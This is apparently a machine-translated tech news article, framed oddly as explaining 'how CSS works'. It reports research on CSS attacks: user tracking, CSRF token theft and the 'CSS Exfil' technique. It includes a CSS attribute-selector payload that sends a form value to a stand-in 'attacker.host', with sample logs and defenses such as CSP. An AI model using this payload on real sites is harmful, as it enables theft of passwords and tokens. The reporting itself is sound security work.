Shulou(Shulou.com)05/31 Report--

This article mainly introduces "what is the working principle of CSS". In daily operation, I believe that many people have doubts about the working principle of CSS. The editor consulted all kinds of materials and sorted out simple and easy-to-use operation methods. I hope it will be helpful for you to answer the doubts about "what is the working principle of CSS?" Next, please follow the editor to study!

CSS is not only powerful in the presentation of web pages, but also plays a role in tracking users. It can track website users, extract and steal data from web pages, collect data entered in form fields (including passwords), and even expose the identity of dark web users.

In the past month, three interesting research projects have used CSS as an attack vector, showing that this seemingly harmless language can also be used against users.

Use CSS to track users on the page

The first project on this topic is JanB ö hmer's project "Crooked Style Sheets", which provides a JavaScript-free tracking scheme that tracks users interactively through the pages of CSS code.

B ö hmer says he can track when users hover, click links, enter text in input fields, and collect large amounts of real user agent information, even if they use fake UA.

Using CSS to steal CSRF token

Unlike the work of B ö hmer, security researcher Dylan Ayrey (XSSJacking author) also released new research over the weekend showing how attackers misuse CSS to steal CSRF (user authentication) token.

Ayrey's attack only applies to Web sites and applications that store CSRF tokens in the attributes of various HTML page elements, so its scope is very limited. This attack can be easily defeated by site / application owners who find a more secure way to authenticate users without dumping CSRF tokens in the source code of the page.

Ayrey's technology relies on injecting CSS code into a web page, using the CSS property selector to guess one letter of CSRF token at a time.

The attack takes about 10 seconds to complete and can even work without iframe, and remote servers that do not require continuous traffic have no opportunity to alert users who have problems.

The threat of the CSS property selector does not stop there.

Ayrey's research is only superficial. Over the past month, security researcher Mike Gualtieri has been trying to use the same technology, but not just to steal token.

Gualtieri studies how to use the CSS attribute selector to guess the sensitive content left in the HTML tag.

Researchers can use this method to collect sensitive user data, including password strings, entered in the form field.

working principle

Both Ayrey and Gualtieri's methods take advantage of the CSS property selector, which allows developers to query page HTML tags for individual attributes and match their values.

For example, the following CSS code searches for link elements ("a") in the page where the "href" attribute contains the "facebook" string, and adds blue to all of these links.

A [href*= "facebook"] {color: blue;}

These queries may seem harmless, but in the eyes of researchers, they may be used to carry out attacks.

These queries can be spliced together to perform basic dictionary brute force attacks and try to guess the starting letter of the attribute, and then add the recognized letter to the new pattern matching syntax so that the attacker can guess the second letter, the third letter and so on.

[attribute=value] [foo=bar] Select all elements of foo= "bar"

[attribute~=value] [foo~=bar] Select all elements that contain the foo attribute of the word "bar"

[attribute | = value] [foo | = bar] Select all elements with the value of the foo attribute starting with "bar"

[attribute ^ = value] [Foo ^ = "bar"] Select all elements with the value of the foo attribute starting with "bar"

[attribute$=value] [foo$= "bar"] Select all elements with the value of the foo attribute ending with "bar"

[attribute*=value] [foo*= "bar"] Select all elements that contain the foo attribute of the substring "bar"

The attacker needs to construct a malicious HTTP request to execute the CSS code selector.

# username [value= "ZeroC00L"] {background:url ("https://attacker.host/ZeroC00L");}"

The attacker only needs to filter the server 404 to find the desired results.

127.0.0.1-[30/Jan/2018:11:09:35-0500] "GET / 00 HTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:35-0500] "GET / 0L HTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:36-0500] "GET / Ze HTTP/1.1" 404 22127.0.0. 1-- [30/Jan/2018:11:09:36-0500] "GET / ZHTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:36-0500] "GET / ro HTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:36-0500] "GET / oC HTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:36-0500] "GET / _ L HTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:36-0500] "GET / er HTTP/1.1" 404 22127.0.0.1-[30/Jan/2018:11:09:36-0500] "GET / C0 HTTP/1.1" 404 22

And then combine the strings into complete data.

Z # Z_Ze # ZeZer # erZero # roZeroC # oCZeroC0 # C0ZeroC00 # 00ZeroC00L # 0L _ L

Ayrey and Gualtieri attack in two different ways. Ayrey guesses the last letter at once, while Gualtieri reconstructs the string through multiple guesses and finally combines them.

Both methods are effective. Ayrey's method is noisy but can be easily automated, while Gualtieri's method is faster (and can also be automated), but in some cases relies on people to concatenate strings.

Gualtieri named this technology CSS Exfil. However, CSS Exfil can only steal the HTML attribute on the page at load time, not from the dynamically injected code after the initial page load. Gualtieri doesn't think this is a big problem, and his research mentions that attackers can have a variety of solutions.

Defense mode

Preventing CSS Exfil attacks can be divided into two levels. First, Web site and web application authors can enforce content security policies (CSP) to prevent attackers from loading CSS code from the outside.

Second, visitors can also install Gualtieri's Firefox or Chrome extensions, which can detect all types of CSS Exfil attacks recorded by Gualtieri in his research and rewrite malicious code before execution.

You can visit the web page here for testing.

At this point, the study on "how CSS works" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.